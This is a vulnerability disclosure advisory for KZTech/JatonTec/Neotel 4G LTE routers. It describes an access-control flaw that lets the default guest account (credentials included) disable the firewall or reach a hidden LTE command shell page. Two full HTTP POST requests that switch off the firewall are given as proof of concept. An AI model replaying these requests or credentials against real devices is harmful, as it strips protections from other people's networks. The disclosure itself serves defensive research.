Below is a copy: KZTech/JatonTec/Neotel JT3500V 4G LTE CPE 2.0.1 Insecure Direct Object Reference
KZTech/JatonTec/Neotel JT3500V 4G LTE CPE 2.0.1 Improper Access Control (IDOR)
Vendor: KZ Broadband Technologies, Ltd. | Jaton Technology, Ltd.
Product web page: http://www.kzbtech.com | http://www.jatontec.com | https://www.neotel.mk
http://www.jatontec.com/products/show.php?itemid=258
http://www.jatontech.com/CAT12.html#_pp=105_564
http://www.kzbtech.com/AM3300V.html
https://neotel.mk/ostanati-paketi-2/
Affected version: Model | Firmware
-------|---------
JT3500V | 2.0.1B1064
JT3300V | 2.0.1B1047
AM6200M | 2.0.0B3210
AM6000N | 2.0.0B3042
AM5000W | 2.0.0B3037
AM4200M | 2.0.0B2996
AM4100V | 2.0.0B2988
AM3500MW | 2.0.0B1092
AM3410V | 2.0.0B1085
AM3300V | 2.0.0B1060
AM3100E | 2.0.0B981
AM3100V | 2.0.0B946
AM3000M | 2.0.0B21
KZ7621U | 2.0.0B14
KZ3220M | 2.0.0B04
KZ3120R | 2.0.0B01
Summary: JT3500V is a most advanced LTE-A Pro CAT12 indoor Wi-Fi
& VoIP CPE product specially designed to enable quick and easy
LTE fixed data service deployment for residential and SOHO customers.
It provides high speed LAN, Wi-Fi and VoIP integrated services
to end users who need both bandwidth and multi-media data service
in residential homes or enterprises. The device has 2 Gigabit LAN
ports, 1 RJ11 analog phone port, high performance 4x4 MIMO and
CA capabilities, 802.11b/g/n/ac dual band Wi-Fi, advanced routing
and firewall software for security. It provides an effective
all-in-one solution to SOHO or residential customers. It can
deliver up to 1Gbps max data throughput which can be very
competitive to wired broadband access service.
Desc: Insecure direct object references occur when an application
provides direct access to objects based on user-supplied input. As
a result of this vulnerability attackers can bypass authorization
and access the hidden resources in the system and execute privileged
functionalities.
Tested on: GoAhead-Webs/2.5.0 PeerSec-MatrixSSL/3.1.3-OPEN
Linux 2.6.36+ (mips)
Mediatek APSoC SDK v4.3.1.0
Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
@zeroscience
Advisory ID: ZSL-2021-5640
Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2021-5640.php
03.02.2021
--
The guest account user:user123 can navigate to /system_firewall.html page
and disable the firewall. The guest account can access any page directly
and modify the device.
Or navigate to the hidden /lte/cmdshell.html page and execute LTE protocol
stack commands.
Ref: https://cwe.mitre.org/data/definitions/732.html
Disable the firewall IDOR (newer models):
-----------------------------------------
POST /goform/set_sys_firewall HTTP/1.1
Host: 192.168.1.1
Connection: keep-alive
Content-Length: 167
Accept: */*
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.146 Safari/537.36
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Origin: https://192.168.1.1
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: cors
Sec-Fetch-Dest: empty
Referer: https://192.168.1.1/system_firewall.html
Accept-Encoding: gzip, deflate, br
Accept-Language: en-US,en;q=0.9,mk;q=0.8,sr;q=0.7,hr;q=0.6
Cookie: uid=token:b24649a236d0e1951b2d2f16430dfb1b
enableFirewall: 0
pingFrmWANFilterEnabled: 0
blockPortScanEnabled: 0
blockSynFloodEnabled: 0
spiFWEnabled: 1
ftp_alg_enable_val: 1
pptp_alg_enable_val: 1
sip_alg_enable_val: 1
Disable the firewall IDOR (older models):
-----------------------------------------
POST /goform/websSysFirewall HTTP/1.1
Host: 192.168.1.1
Connection: keep-alive
Content-Length: 167
Accept: */*
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.150 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Origin: http://192.168.1.1
Referer: http://192.168.1.1/system_firewall.asp
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9,mk;q=0.8,sr;q=0.7,hr;q=0.6
Cookie: kz_userid=admin:4540141
enableFirewall: 0
pingFrmWANFilterEnabled: 0
blockPortScanEnabled: 0
blockSynFloodEnabled: 0
spiFWEnabled: 1
ftp_alg_enable_val: 1
pptp_alg_enable_val: 1
sip_alg_enable_val: 1
This information is provided for TESTING and LEGAL RESEARCH purposes only. All trademarks used are properties of their respective owners. By visiting this website you agree to Terms of Use and Privacy Policy and Impressum